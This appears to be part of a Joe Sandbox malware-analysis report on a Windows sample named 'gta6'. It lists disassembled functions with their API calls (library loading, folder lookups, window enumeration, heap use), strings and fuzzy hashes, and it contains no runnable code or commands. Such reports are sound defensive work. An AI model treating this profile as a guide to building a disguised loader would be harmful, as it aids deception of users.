Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
Instruction ID: b94fce4af05d2a3b47cf10f4c42de706c870d6d3f1c440dba90fb4ad6b70bb1c
Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
Instruction Fuzzy Hash: 3941BB32310640CAFBAA9B1AE020BEE3691E7997C5FD49115DB819FAF0D63BD4058B40

Function 000000014001F888 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac13def6a5a8efd4e31b4935657a06df326012abae1516aab9cba758a36c4567
Instruction ID: bf6872aabbb71bd0daffb4897767ff28f083bf2ebca1510eb6d3b76ecabc12d3
Opcode Fuzzy Hash: ac13def6a5a8efd4e31b4935657a06df326012abae1516aab9cba758a36c4567
Instruction Fuzzy Hash: B0410DA740DBC51AF3A35A794C653AD3FA0A396F54F4E809BE3804B2E3E67748059312

Function 000000014000BC94 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 115libraryloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 000000014000BCDB
memset.MSVCRT ref: 000000014000BCEC
LoadLibraryW.KERNEL32 ref: 000000014000BCFB
GetProcAddress.KERNEL32 ref: 000000014000BD1C
GetProcAddress.KERNEL32 ref: 000000014000BD2F
wcsncpy.MSVCRT ref: 000000014000BD53
wcslen.MSVCRT ref: 000000014000BD66
CoTaskMemFree.COMBASE ref: 000000014000BDF2
wcslen.MSVCRT ref: 000000014000BDFB
FreeLibrary.KERNEL32 ref: 000000014000BE18

Strings

SHELL32.DLL, xrefs: 000000014000BCF1
P, xrefs: 000000014000BD9C
SHGetPathFromIDListW, xrefs: 000000014000BD22
SHBrowseForFolderW, xrefs: 000000014000BD12

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 217932011-4219398408
Opcode ID: baf9e754506da9efa04bb7baef11d081e03a89bf48f902bbef2c1cfc2494dcfa
Instruction ID: f53257261a77fa7679be829afa5858120bcd1a05ac071047bacb850080d37645
Opcode Fuzzy Hash: baf9e754506da9efa04bb7baef11d081e03a89bf48f902bbef2c1cfc2494dcfa
Instruction Fuzzy Hash: F7418D72211B8082EB16EF12E8443EA73A4F78CBC8F544125EB4A477A5EF39C95AC700

Function 000000014000DB18 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 107libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400126D0: TlsGetValue.KERNEL32 ref: 00000001400126E2
Part of subcall function 00000001400126D0: RtlReAllocateHeap.NTDLL ref: 0000000140012762

LoadLibraryW.KERNEL32 ref: 000000014000DB51
GetProcAddress.KERNEL32 ref: 000000014000DB69
wcscpy.MSVCRT ref: 000000014000DB9A
wcscat.MSVCRT ref: 000000014000DBA9
wcslen.MSVCRT ref: 000000014000DBB1
CoTaskMemFree.COMBASE ref: 000000014000DBBE
FreeLibrary.KERNEL32 ref: 000000014000DBC7
wcscat.MSVCRT ref: 000000014000DBEC
wcslen.MSVCRT ref: 000000014000DBF4

Strings

Downloads\, xrefs: 000000014000DBE2
Shell32.DLL, xrefs: 000000014000DB4A
SHGetKnownFolderPath, xrefs: 000000014000DB5F

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1878685483-287042676
Opcode ID: af3ba110e3d0ba57517c83c0fb64a893d7f1b6ff8354fe36c6ead1af46344a34
Instruction ID: ffb59ae5301eeda9161766390bd85b6f914ac2b2dd013f36d3426db2d5643a12
Opcode Fuzzy Hash: af3ba110e3d0ba57517c83c0fb64a893d7f1b6ff8354fe36c6ead1af46344a34
Instruction Fuzzy Hash: A64186B1214A46C2FA27EB57B4947F97291AB8C7D0F540127BB0A0B7F5DEB9C841C611

Function 0000000140008260 Relevance: 13.7, APIs: 9, Instructions: 249COMMON

Download Yara Rule

APIs

wcsncpy.MSVCRT ref: 0000000140008373

Part of subcall function 0000000140012630: TlsGetValue.KERNEL32 ref: 000000014001263F

_wcsdup.MSVCRT ref: 00000001400083AD
_wcsdup.MSVCRT ref: 00000001400083D0
_wcsdup.MSVCRT ref: 00000001400083EE
wcsncpy.MSVCRT ref: 00000001400084F6
free.MSVCRT ref: 0000000140008570
free.MSVCRT ref: 0000000140008582
free.MSVCRT ref: 0000000140008596
wcsncpy.MSVCRT ref: 00000001400085CE

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: _wcsdupfreewcsncpy$Value
String ID:
API String ID: 1554701960-0
Opcode ID: eae06682ae28bc4f435427b58f7a54a08f3b8b88289e45f38b0b7b827e51cabb
Instruction ID: da1d114085ca4aa9233c1495fb0579f216bdf29e57c82a9bb0fca7f891cc91e6
Opcode Fuzzy Hash: eae06682ae28bc4f435427b58f7a54a08f3b8b88289e45f38b0b7b827e51cabb
Instruction Fuzzy Hash: AE91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701

Function 000000014000BEA0 Relevance: 12.0, APIs: 8, Instructions: 44threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32 ref: 000000014000BEAF
GetCurrentThreadId.KERNEL32 ref: 000000014000BEB7
IsWindowVisible.USER32 ref: 000000014000BEC4

Part of subcall function 0000000140011CB0: RtlAllocateHeap.NTDLL ref: 0000000140011CC8

GetCurrentThreadId.KERNEL32 ref: 000000014000BEE6
GetWindowLongPtrW.USER32 ref: 000000014000BEFC
GetForegroundWindow.USER32 ref: 000000014000BF0A
IsWindowEnabled.USER32 ref: 000000014000BF18
EnableWindow.USER32 ref: 000000014000BF2B

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 684997728-0
Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301

Function 0000000140011AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140011AD9
GetProcAddress.KERNEL32 ref: 0000000140011AF5
FreeLibrary.KERNEL32 ref: 0000000140011B1A
Sleep.KERNEL32 ref: 0000000140011B3A

Strings

Kernel32.dll, xrefs: 0000000140011ACD
InitOnceExecuteOnce, xrefs: 0000000140011AEB

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Library$AddressFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 938261879-1339284965
Opcode ID: 315e644546469fd2db35d0db39a019d67f841a3b1ec84ab54f403295059e202d
Instruction ID: b5645326e5d4f07ede329690aacabb45cf3e43243987f71da7b0cd1098b1f21b
Opcode Fuzzy Hash: 315e644546469fd2db35d0db39a019d67f841a3b1ec84ab54f403295059e202d
Instruction Fuzzy Hash: B4118F3120874585EB5ADF57A8843E973A0EB8CBD0F488029AB0A0B666EF3AC595C740

Function 000000014000BF44 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 000000014000BF61
GetCurrentThreadId.KERNEL32 ref: 000000014000BF7A
SetWindowPos.USER32 ref: 000000014000BFAB
GetCurrentThreadId.KERNEL32 ref: 000000014000BFCA
EnableWindow.USER32 ref: 000000014000BFE4
SetWindowPos.USER32 ref: 000000014000C010

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00

Function 00000001400110DC Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0000000140011112
RtlAllocateHeap.NTDLL ref: 000000014001112D
TlsSetValue.KERNEL32 ref: 000000014001113C
TlsGetValue.KERNEL32 ref: 000000014001115F
RtlReAllocateHeap.NTDLL ref: 000000014001117B
TlsSetValue.KERNEL32 ref: 000000014001118D

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Value$AllocateHeap$Alloc
String ID:
API String ID: 2511646910-0
Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740

Function 00000001400117FC Relevance: 7.6, APIs: 5, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL ref: 0000000140011855
RtlAllocateHeap.NTDLL ref: 0000000140011890
RtlLeaveCriticalSection.NTDLL ref: 00000001400118FB
RtlAllocateHeap.NTDLL ref: 0000000140011910
RtlInitializeCriticalSection.NTDLL ref: 0000000140011952

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CriticalSection$AllocateHeap$EnterInitializeLeave
String ID:
API String ID: 2823868979-0
Opcode ID: 9401c8691c50f740a847db88c587e37cfc3cc7e6b1d7d2a34aa6e1dd6b61c51d
Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
Opcode Fuzzy Hash: 9401c8691c50f740a847db88c587e37cfc3cc7e6b1d7d2a34aa6e1dd6b61c51d
Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700

Function 0000000140011968 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL ref: 0000000140011985
RtlLeaveCriticalSection.NTDLL ref: 00000001400119F4

Part of subcall function 0000000140011968: HeapFree.KERNEL32 ref: 00000001400119E7

RtlDeleteCriticalSection.NTDLL ref: 0000000140011A0B
HeapFree.KERNEL32 ref: 0000000140011A1D

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340

Function 000000014000E824 Relevance: 6.3, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000014000E9C7
memset.MSVCRT ref: 000000014000E9D5
memset.MSVCRT ref: 000000014000E9E2
memset.MSVCRT ref: 000000014000E9F1
memset.MSVCRT ref: 000000014000E9FF

Part of subcall function 000000014000FEE4: memcpy.MSVCRT ref: 000000014000FF5C

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: d3cebf725d949ebbd98cb9ef7f68bda467ea1853d0e4d33e0ea42ea6cb49cd70
Instruction ID: a94d66f0502d68e3f48ed78985175dce6facf9e9c189752d3e598d0e8768336a
Opcode Fuzzy Hash: d3cebf725d949ebbd98cb9ef7f68bda467ea1853d0e4d33e0ea42ea6cb49cd70
Instruction Fuzzy Hash: 2231F1B271064081FB16DA2BF4507ED6752E7DDBD0F848126EB1A87BAACE3EC542C740

Function 0000000140013227 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 273COMMON

Download Yara Rule

Strings

, xrefs: 0000000140013227
, xrefs: 000000014001324B
header crc mismatch, xrefs: 00000001400135F1

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID: $ $header crc mismatch
API String ID: 0-4092041874
Opcode ID: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
Instruction ID: 7b7c0dcb7b367ac831aed03830ec8ef67ea91f0dce79e30e5349fd19ccede3bc
Opcode Fuzzy Hash: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
Instruction Fuzzy Hash: F6B1A4726002D48BE7A79B16C488BAE3BEAFB4CB94F164518FB854B3E1D775C940C740

Function 0000000140007A50 Relevance: 6.2, APIs: 4, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0000000140007B33
wcsncpy.MSVCRT ref: 0000000140007B9F
wcsncpy.MSVCRT ref: 0000000140007BF9
HeapFree.KERNEL32 ref: 0000000140007C15

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Heapwcsncpy$AllocateFree
String ID:
API String ID: 2817115924-0
Opcode ID: 148ba3b1c52b5aa1fd378a7d38282354f494ce16b4f038740f7610afa5151547
Instruction ID: b6b9e846c04cb6e9a04139aff3d7e83eda40acee9614ff25bed0c888bce5a2ba
Opcode Fuzzy Hash: 148ba3b1c52b5aa1fd378a7d38282354f494ce16b4f038740f7610afa5151547
Instruction Fuzzy Hash: 3651B2B2B0068485EA66DF26A404BEA77E1F789BD4F588125EF5D477E5EB3CC542C300

Function 000000014001147C Relevance: 6.1, APIs: 4, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL ref: 000000014001149E
RtlAllocateHeap.NTDLL ref: 0000000140011573
RtlAllocateHeap.NTDLL ref: 0000000140011597
RtlLeaveCriticalSection.NTDLL ref: 0000000140011600

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: AllocateCriticalHeapSection$EnterLeave
String ID:
API String ID: 3625150316-0
Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750

Function 0000000140013801 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 105COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00000001400138AA

Strings

, xrefs: 000000014001380B
invalid stored block lengths, xrefs: 0000000140013840
, xrefs: 000000014001382B

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: memcpy
String ID: $ $invalid stored block lengths
API String ID: 3510742995-1718185709
Opcode ID: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
Instruction ID: c92309fc0d38d6234d0408f55a04ce57e81ba093b92e9b8f78a366b710634dd8
Opcode Fuzzy Hash: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
Instruction Fuzzy Hash: F041AC726107A09BE7668F26C4847AD3BA9F70C7C4F215129FF4A4BBA4D735D890CB40

Function 000000014000C4F0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 000000014000C5A6
RtlLookupFunctionEntry.KERNEL32 ref: 000000014000C5E1
RtlVirtualUnwind.KERNEL32 ref: 000000014000C64C
RtlLookupFunctionEntry.KERNEL32 ref: 000000014000C672

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: EntryFunctionLookup$UnwindVirtual
String ID:
API String ID: 3286588846-0
Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700

Function 000000014000D02C Relevance: 6.1, APIs: 4, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 000000014000D0B1
RtlAllocateHeap.NTDLL ref: 000000014000D0C7
wcscpy.MSVCRT ref: 000000014000D0D7
memset.MSVCRT ref: 000000014000D111

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: AllocateHeapmemsetwcscpywcslen
String ID:
API String ID: 2037025450-0
Opcode ID: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
Instruction ID: 6743f53f77a36836f55a7605488c5dfe466d4e7a0e85049e430ca513693cbf19
Opcode Fuzzy Hash: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
Instruction Fuzzy Hash: 6D3109B5605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518350

Function 000000014000CCD8 Relevance: 6.1, APIs: 4, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CE61
Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CE74
Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CE8F
Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CEB1

RtlAllocateHeap.NTDLL ref: 000000014000CD11
RtlAllocateHeap.NTDLL ref: 000000014000CD42
RtlAllocateHeap.NTDLL ref: 000000014000CDB2
HeapFree.KERNEL32 ref: 000000014000CDD8

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Heap$Free$Allocate
String ID:
API String ID: 3472947110-0
Opcode ID: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
Instruction ID: 5bc8d6a19ab5820ea12ddcb4c1614eb0e390fbda2a9c6e8bfd6285e08278190a
Opcode Fuzzy Hash: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
Instruction Fuzzy Hash: B73142B2211B409BE702DF13EA807A977A4F788BC0F448429EB4847B65DF79E4A6C740

Function 00000001400085F0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

CharLowerW.USER32 ref: 000000014000861A
CharLowerW.USER32 ref: 000000014000864F
CharLowerW.USER32 ref: 000000014000867D
CharLowerW.USER32 ref: 0000000140008688

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: aabfa1885bbcdd7278eb26932432713e72225ea50af0810a3f1a86d8e5eb4003
Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
Opcode Fuzzy Hash: aabfa1885bbcdd7278eb26932432713e72225ea50af0810a3f1a86d8e5eb4003
Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710

Function 00000001400174E0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 000000014001753E
malloc.MSVCRT ref: 0000000140017550
